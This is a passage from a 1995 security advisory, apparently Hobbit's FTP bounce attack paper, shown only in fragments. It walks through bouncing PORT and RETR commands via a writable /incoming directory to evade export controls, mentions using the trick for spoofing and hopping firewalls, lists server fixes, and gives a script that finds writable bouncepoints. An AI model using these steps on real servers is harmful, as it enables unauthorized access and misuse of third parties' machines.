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*Hobbit* &lt;hobbit@avi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FTP Bounc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Jul 1995 03:50:50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es one of many possible uses of the "FTP server bounce at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s probably well-known, but to date interest in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xing it seems low to nonexistent.  This particular example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way in which most electronically enforced "export restriction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seless and trivial to bypass.  It is chosen in an effo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sit up and notice that there are some really ill-conceiv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Alain Knaff at imag.fr for a brief but entertain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se issues a couple of months ago which got me thin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user on foreign.fr, IP address F.F.F.F, and want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ource code from crypto.com in the US.  The FTP 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com is set up to allow your connection, but deny access to the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ecause your source IP address is that of a non-US site [as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TP server can determine from the DNS, that is].  In any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irectly retrieve what you want from crypto.com'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rypto.com will allow ufred.edu to download crypto sourc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ed.edu is in the US too.  You happen to know that /incoming on ufre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ld-writeable directory that any anonymous user can drop files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back from.  Crypto.com's IP address is C.C.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have an FTP server that does passive mode.  Open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your own machine's real IP address [not localhost]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convenient directory that you have write access to, and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"pas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"stor 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address and port that are returned from the PASV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,F,F,F,X,X.  This FTP session will now hang, so background it or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or something to proceed with the re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file containing FTP server commands.  Let's call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s". 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-anonymous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/export-restricted-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F,F,F,F,X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 crypto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^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^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@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^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,F,F,F,X,X is the same address and port that your own machine ha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connection.  The trash at the end is extra lines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ing 250 NULLS and nothing else, enough to fill up about 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.  The reason for this filler i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connection to ufred.edu, log in anonymously, and cd to /in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following into this FTP session, which transfer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rs" file over and then tells ufred.edu's FTP server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.com's FTP server using your file as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"port C,C,C,C,0,2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 "retr inst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.tar.Z should now show up as "foobar" on your machine via your firs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the connection to ufred.edu didn't die by itself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ommon server bug, clean up by deleting "instrs" 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have to reconnec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nts of this.  Your PASV listener conn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any machine that you have file write access to -- your own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ufred.edu, or somewhere completely unrelated.  In fac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have to be an FTP server -- any utility that will listen o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port and read raw data from it into a file will do.  A passive-mod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is simply a convenient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lls at the end of the command file are to fill up the TC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end of the ufred -&gt; crypto connection, and ensur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ays open long enough for the whole session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st FTP servers tend to abort all transfers and com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rol connection closes prematurely.  The size of the data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both the receive and transmit windows, which on some OS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[on the order of 30K].  You can trim this down if you know what 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either end and the sum of their default TCP window sizes.  I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nes of 250 characters to avoid overrunning command buffer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- probably academic since you told the server to qu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ypto.com disallows *any* FTP client connection from you at foreign.f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e what files are where, you can always put "list -aR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nd get a directory listing of the entire tree via u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trieve your command file to the target's FTP serve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ather than binary mode.  Some FTP servers can deal with raw newl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need command lines terminated by CRLF pairs.  Keep this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files to daemons other than FTP server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such third-party connections are one-way on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ll kinds of things.  Similar methods can be us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traceable mail and news, hammer on servers at various sites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ks, try to hop firewalls, and generally be annoying and har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he same time.  A little thought will bring realization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launched this way come from source port 20, which some sit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firewalls in an effort to deal with the "ftp-data" probl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rposes, this can be the next best thing to source-routed attack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succeed where source routing fails against packet filters. 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de possible by the way the FTP protocol spec was writte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s to come from anywhere and data connections to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lways be sites on the net with creaky old FTP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ble directories that allow this sort of traffic, so saying "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ervers" is the wrong answer.  But you can protect your o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ing a third-party bouncepoint and having another one us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vious thing to do is allow an FTP server to only m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same host that the control connection origin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prevent the above attack, of course, since the PASV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on ufred.edu and thus meet that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prevent *your* site from being a potential bouncepoin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e concept of "proxy FTP", but hidden somewhere in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tiny vi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vious thing is to prohibit FTP control connections tha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orts, or at least port 20.  This prevents the above scenari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things, plus the usual poop about blocking source-rou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venues of spoofery, are necessary to prevent hacks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k about whether or not you really need an open "incoming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ing passive-mode client data connections is another pos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till too many FTP clients in use that aren't passiv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loose consensus and running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existing work addressing this available here at avian.org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r several months, I might add] in the "fixkits archive"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to wu-ftpd-2.4 are presented, which includes code to prevent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se bogus PORT commands.  Recent security fixes from elsew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, along with s/key support and various compile-tim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 up security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ber at academ.com is working on merging these and several oth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rue updated wu-ftpd release.  There are a couple of other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going on.  Nowhere is it claimed that any of this work is comple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start toward something I have had in mind for a while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-wide release of wu-ftpd-2.5, with contributions from around the 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-ftpd server has become very popular, but is in sad need of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upgrade.  It would be nice to pull all the improvements toge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ordinated place, and it looks like it will happen.  All of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elp people who insist on running vendor-supplied server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ity-checking the client connection's source port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 the FTP server fixes, but in modifications to Wiet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-wrappers package since this problem is more general.  A simple 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hat denies connections from configurable ranges of source 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d stage, before a called daem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is pointed to by /src/fixkits/README in th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here.  Read this roadmap before grabbi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nulls at the end of the command file was the key to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a variety of daemons.  Simply sending the desired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il due to the immediate close signaling the daemon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USTL has not given up entirely on the whole wu-ftpd projec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very quiet about further work.  Bryan O'Connor appears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to attend to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l script to find world-writeable and ftp-owne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unix-based anonymous FTP server.  You'd be surprised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riteable "bouncepoints" pop out after a short run of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You will have to later check that you can both PUT and GE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ces; some servers protect uploaded files against reading.  Many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onder why they are among this week's top ten warez si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-n $1 &lt;&lt;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"user f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"pass -nobody@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"-aR" xxx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smart enough to figure out ftp's numeric UID if no passw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v xxx.$$ | awk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 idir = "/" ; dirp =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.:$/ { idir = $0 ; dirp = 1 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[-d][-r](......w.|........  *[0-9]* ftp  *)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irp == 1) print i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'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xxx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one could call this a white paper.  It is up for grabs at avia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random/ftp-attack as well as being posted in various releva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*  950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